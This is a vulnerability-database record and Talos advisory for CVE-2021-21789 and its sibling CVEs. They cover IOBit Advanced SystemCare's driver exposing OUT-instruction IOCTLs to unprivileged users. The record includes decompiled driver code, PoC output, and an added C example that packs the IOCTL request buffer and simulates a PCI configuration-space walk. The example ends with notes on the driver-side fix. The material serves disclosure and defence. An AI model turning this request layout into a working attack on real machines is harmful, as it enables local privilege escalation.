ID CVE-2021-21789 Type cve Reporter talos-cna@cisco.com Modified 2022-04-28T17:15:00
Description
A privilege escalation vulnerability exists in the way IOBit Advanced SystemCare Ultimate 14.2.0.220 driver handles Privileged I/O write requests. During IOCTL 0x9c40a0e0, the first dword passed in the input buffer is the device port to write to and the dword at offset 4 is the value to write via the OUT instruction. A local attacker can send a malicious IRP to trigger this vulnerability.
{"id": "CVE-2021-21789", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-21789", "description": "A privilege escalation vulnerability exists in the way IOBit Advanced SystemCare Ultimate 14.2.0.220 driver handles Privileged I/O write requests. During IOCTL 0x9c40a0e0, the first dword passed in the input buffer is the device port to write to and the dword at offset 4 is the value to write via the OUT instruction. A local attacker can send a malicious IRP to trigger this vulnerability.", "published": "2021-07-07T17:15:00", "modified": "2022-04-28T17:15:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 4.6}, "severity": "MEDIUM", "exploitabilityScore": 3.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21789", "reporter": "talos-cna@cisco.com", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2021-1254"], "cvelist": ["CVE-2021-21789"], "immutableFields": [], "lastseen": "2022-04-28T19:33:21", "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "talos", "idList": ["TALOS-2021-1254"]}], "rev": 4}, "score": {"value": 
4.1, "vector": "NONE"}, "twitter": {"counter": 3, "modified": "2021-07-09T18:17:17", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1415748122253348869", "text": " NEW: CVE-2021-21789 A privilege escalation vulnerability exists in the way IOBit Advanced SystemCare Ultimate 14.2.0.220 driver handles Privileged I/O write requests. During IOCTL 0x9c40a0e0, the first dword pa... (click for more) Severity: HIGH https://t.co/RKYHS0IzfJ?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1415748122253348869", "text": " NEW: CVE-2021-21789 A privilege escalation vulnerability exists in the way IOBit Advanced SystemCare Ultimate 14.2.0.220 driver handles Privileged I/O write requests. During IOCTL 0x9c40a0e0, the first dword pa... (click for more) Severity: HIGH https://t.co/RKYHS0IzfJ?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1415779596763635716", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-21789 (advanced_systemcare_ultimate)) has been published on https://t.co/KHPlHnOi3O?amp=1"}]}, "backreferences": {"references": [{"type": "talos", "idList": ["TALOS-2021-1254"]}]}, "exploitation": null, "vulnersScore": 4.1}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": "Talos", "cvss": {"3": {"vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "score": 8.8}}}, "cpe": ["cpe:/a:iobit:advanced_systemcare_ultimate:14.2.0.220"], "cpe23": ["cpe:2.3:a:iobit:advanced_systemcare_ultimate:14.2.0.220:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "affectedSoftware": [{"cpeName": "iobit:advanced_systemcare_ultimate", "version": "14.2.0.220", "operator": "eq", "name": "iobit advanced systemcare ultimate"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:iobit:advanced_systemcare_ultimate:14.2.0.220:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": 
"https://talosintelligence.com/vulnerability_reports/TALOS-2021-1254", "name": "https://talosintelligence.com/vulnerability_reports/TALOS-2021-1254", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"talos": [{"lastseen": "2022-01-26T11:42:09", "description": "### Summary\n\nA privilege escalation vulnerability exists in the way IOBit Advanced SystemCare Ultimate 14.2.0.220 driver handles Privileged I/O write requests. A specially crafted I/O request packet (IRP) can lead to privileged writes which can result in elevation of privileges of the current user. A local attacker can send a malicious IRP to trigger this vulnerability.\n\n### Tested Versions\n\nIOBit Advanced SystemCare Ultimate 14.2.0.220\n\n### Product URLs\n\n<https://www.iobit.com/>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-782 - Exposed IOCTL with Insufficient Access Control\n\n### Details\n\nIOBit Advanced SystemCare Ultimate provides a solution for keeping track of running services, processes that are using a large amount of memory, software updates, and the ability to update drivers to the latest versions.\n\nAdvanced SystemCare also provides a monitoring driver to help facilitate its tasks. This driver creates `\\Device\\IOBIT_WinRing0_1_3_0`, which is readable and writable by everyone. The driver also provides a callback for handling `IRP_MJ_DEVICE_CONTROL` requests to the driver.\n\nThe driver used in this analysis is below:\n\nMonitor_win10_x64.sys e4a7da2cf59a4a21fc42b611df1d59cae75051925a7ddf42bf216cc1a026eadb\n\n#### CVE-2021-21787 - Exposed OUT byte\n\nDuring IOCTL `0x9c40a0d8`, the first `dword` passed in the input buffer is the device port to write to and the `byte` at offset 4 is the value to write via the `OUT` instruction. 
The `OUT` instruction can write one byte to the given I/O device port, potentially leading to escalated privileges of unprivileged users.\n \n \n Monitor_win10_x64.sys+0x11310\n \n u32_at_0 = *(_DWORD *)input_buffer_1;\n switch ( ioctl )\n {\n case 0x9C40A0D8:\n __outbyte(u32_at_0, *((_BYTE *)input_buffer_1 + 4));\n goto LABEL_64;\n \n\n#### CVE-2021-21788 - Exposed OUT word\n\nDuring IOCTL `0x9c40a0dc`, the first `dword` passed in the input buffer is the device port to write to and the `word` at offset 4 is the value to write via the `OUT` instruction. The `OUT` instruction can write one word (two bytes) to the given I/O device port, potentially leading to escalated privileges of unprivileged users.\n \n \n Monitor_win10_x64.sys+0x11310\n \n u32_at_0 = *(_DWORD *)input_buffer_1;\n switch ( ioctl )\n {\n ...\n case 0x9C40A0DC:\n __outword(u32_at_0, *((_WORD *)input_buffer_1 + 2));\n goto LABEL_64;\n \n\n#### CVE-2021-21789 - Exposed OUT dword\n\nDuring IOCTL `0x9c40a0e0`, the first `dword` passed in the input buffer is the device port to write to and the `dword` at offset 4 is the value to write via the `OUT` instruction. 
The `OUT` instruction can write one dword (four bytes) to the given I/O device port, potentially leading to escalated privileges of unprivileged users.\n \n \n Monitor_win10_x64.sys+0x11310\n \n u32_at_0 = *(_DWORD *)input_buffer_1;\n switch ( ioctl )\n {\n ...\n case 0x9C40A0E0:\n __outdword(u32_at_0, *((_DWORD *)input_buffer_1 + 1));\n goto LABEL_64;\n \n\n#### Exploit Proof of Concept\n\nIn combination with the exposed `IN` instruction, an unprivileged user can access PCI devices on the system.\n \n \n Opening Device\n File Handle: 0xa0\n Dumping PCI devices\n Device: 0x1237 Vendor: 0x8086\n Device: 0x7000 Vendor: 0x8086\n Device: 0x100e Vendor: 0x80ee\n Device: 0x2668 Vendor: 0x8086\n Device: 0x003f Vendor: 0x106b\n Device: 0x7113 Vendor: 0x8086\n Device: 0x2829 Vendor: 0x8086\n \n\n### Timeline\n\n2021-03-10 - Follow up with vendor \n2021-04-30 - 2nd follow up with vendor \n2021-05-17 - 3rd follow up with vendor \n2021-06-27 - Final follow up with vendor \n2021-07-07 - Public release\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-07T00:00:00", "type": "talos", "title": "IOBit Advanced SystemCare Ultimate privileged I/O write vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, 
"acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21787", "CVE-2021-21788", "CVE-2021-21789"], "modified": "2021-07-07T00:00:00", "id": "TALOS-2021-1254", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1254", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}]}
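The description and the Talos details above give the request shape (port dword at offset 0, value at offset 4, IOCTL `0x9c40a0e0` dispatched straight to `__outdword`) and a PoC that walks PCI devices with the matching `IN` primitive. The following is an added worked example, written for this page and not code from Talos or IOBit: it decodes the three IOCTL codes into their CTL_CODE fields, builds and re-parses the 8-byte input buffer exactly as the driver dereferences it, and performs the PCI configuration-space walk (legacy mechanism #1, ports 0xCF8/0xCFC) that the PoC output implies. Because user-mode code cannot execute `IN`/`OUT`, port I/O is simulated against a constructed bus-0 table; the vendor/device IDs come from the advisory's dump, while the slot numbers are invented for the simulation. The IOCTL number for the `IN` side is not on the page and is not assumed here.

```c
/* Added example (not from the Talos advisory or IOBit): the 8-byte METHOD_BUFFERED
 * request the Monitor driver dereferences, the IOCTL code fields, and the PCI
 * config-space walk an exposed OUT/IN pair enables. Port I/O is simulated here. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IOCTL_OUT_BYTE  0x9c40a0d8u   /* CVE-2021-21787: __outbyte  */
#define IOCTL_OUT_WORD  0x9c40a0dcu   /* CVE-2021-21788: __outword  */
#define IOCTL_OUT_DWORD 0x9c40a0e0u   /* CVE-2021-21789: __outdword */

/* Windows CTL_CODE layout: DeviceType<<16 | Access<<14 | Function<<2 | Method. */
struct ctl_code { uint32_t device_type, access, function, method; };

struct ctl_code decode_ctl_code(uint32_t code)
{
    struct ctl_code c;
    c.device_type = code >> 16;
    c.access      = (code >> 14) & 0x3;  /* 0 ANY, 1 READ, 2 WRITE; checked against the handle only */
    c.function    = (code >> 2) & 0xfff;
    c.method      = code & 0x3;          /* 0 = METHOD_BUFFERED: input is copied to SystemBuffer */
    return c;
}

/* Caller side: port dword at offset 0, value at offset 4. x86 ports are 16-bit,
 * but the driver reads a full dword, so the upper half is simply zero. */
size_t pack_out_request(uint8_t buf[8], uint16_t port, uint32_t value)
{
    uint32_t p = port;
    memcpy(buf, &p, 4);
    memcpy(buf + 4, &value, 4);
    return 8;
}
/* Driver side: the two dereferences the decompiled switch performs. */
uint32_t request_port(const uint8_t buf[8])  { uint32_t v; memcpy(&v, buf, 4);     return v; }
uint32_t request_value(const uint8_t buf[8]) { uint32_t v; memcpy(&v, buf + 4, 4); return v; }

/* PCI configuration mechanism #1: type-1 address to 0xCF8, data read from 0xCFC. */
#define PCI_CONFIG_ADDR 0xCF8
#define PCI_CONFIG_DATA 0xCFC

uint32_t pci_cfg_addr(uint8_t bus, uint8_t dev, uint8_t fn, uint8_t reg)
{
    return 0x80000000u | ((uint32_t)bus << 16) | ((uint32_t)(dev & 0x1f) << 11)
         | ((uint32_t)(fn & 0x7) << 8) | (uint32_t)(reg & 0xfc);
}

typedef void     (*out32_fn)(uint16_t port, uint32_t value);
typedef uint32_t (*in32_fn)(uint16_t port);

/* Simulated port I/O over a constructed bus-0 table built from the IDs in the
 * advisory's dump; the slot numbers are invented, the advisory does not give them. */
static uint32_t sim_addr_reg;
static const struct { uint8_t dev; uint16_t vendor, device; } sim_pci[] = {
    {0, 0x8086, 0x1237}, {1, 0x8086, 0x7000}, {2, 0x80ee, 0x100e}, {3, 0x8086, 0x2668},
    {4, 0x106b, 0x003f}, {5, 0x8086, 0x7113}, {6, 0x8086, 0x2829},
};

void sim_outdword(uint16_t port, uint32_t value)
{
    if (port == PCI_CONFIG_ADDR) sim_addr_reg = value;
}

uint32_t sim_indword(uint16_t port)
{
    if (port != PCI_CONFIG_DATA || !(sim_addr_reg & 0x80000000u)) return 0xffffffffu;
    uint32_t bus = (sim_addr_reg >> 16) & 0xff, dev = (sim_addr_reg >> 11) & 0x1f;
    if (bus || ((sim_addr_reg >> 8) & 0x7) || (sim_addr_reg & 0xfc)) return 0xffffffffu;
    for (size_t i = 0; i < sizeof sim_pci / sizeof sim_pci[0]; i++)
        if (sim_pci[i].dev == dev)
            return ((uint32_t)sim_pci[i].device << 16) | sim_pci[i].vendor;
    return 0xffffffffu;   /* empty slot reads as all ones, as on real hardware */
}

/* Reads vendor/device of bus:dev.fn via the supplied primitives; returns 0 if the slot is empty. */
int read_pci_id(out32_fn out32, in32_fn in32, uint8_t bus, uint8_t dev, uint8_t fn,
                uint16_t *vendor, uint16_t *device)
{
    out32(PCI_CONFIG_ADDR, pci_cfg_addr(bus, dev, fn, 0));
    uint32_t id = in32(PCI_CONFIG_DATA);
    *vendor = (uint16_t)(id & 0xffff);
    *device = (uint16_t)(id >> 16);
    return *vendor != 0xffff;
}

int main(void)
{
    struct ctl_code c = decode_ctl_code(IOCTL_OUT_DWORD);
    printf("IOCTL 0x%08x: function 0x%x, method %u, access %u (2 = FILE_WRITE_ACCESS)\n",
           IOCTL_OUT_DWORD, c.function, c.method, c.access);
    for (uint8_t dev = 0; dev < 32; dev++) {
        uint16_t vendor, device;
        if (read_pci_id(sim_outdword, sim_indword, 0, dev, 0, &vendor, &device))
            printf("Device: 0x%04x Vendor: 0x%04x\n", device, vendor);
    }
    return 0;
}
```

Two things the decode makes visible. First, all three codes carry `FILE_WRITE_ACCESS` in their Access field, but the I/O manager only compares that field with the access the caller's handle was granted; since the device object is readable and writable by everyone, any local user obtains a write handle and the check is satisfied, which is why the CWE is insufficient access control rather than a parsing bug. Second, `METHOD_BUFFERED` means the 8 bytes land in `SystemBuffer` and are used verbatim as port and value, with no check on which ports are permitted. On a Windows host the `out32` primitive would be a `DeviceIoControl` call on a handle to the device with `IOCTL_OUT_DWORD` and the buffer from `pack_out_request` as input; the usual driver-side fix is to create the device with a DACL limited to SYSTEM and Administrators (for example via `IoCreateDeviceSecure` with an SDDL string) or to refuse the port-I/O IOCTLs altogether.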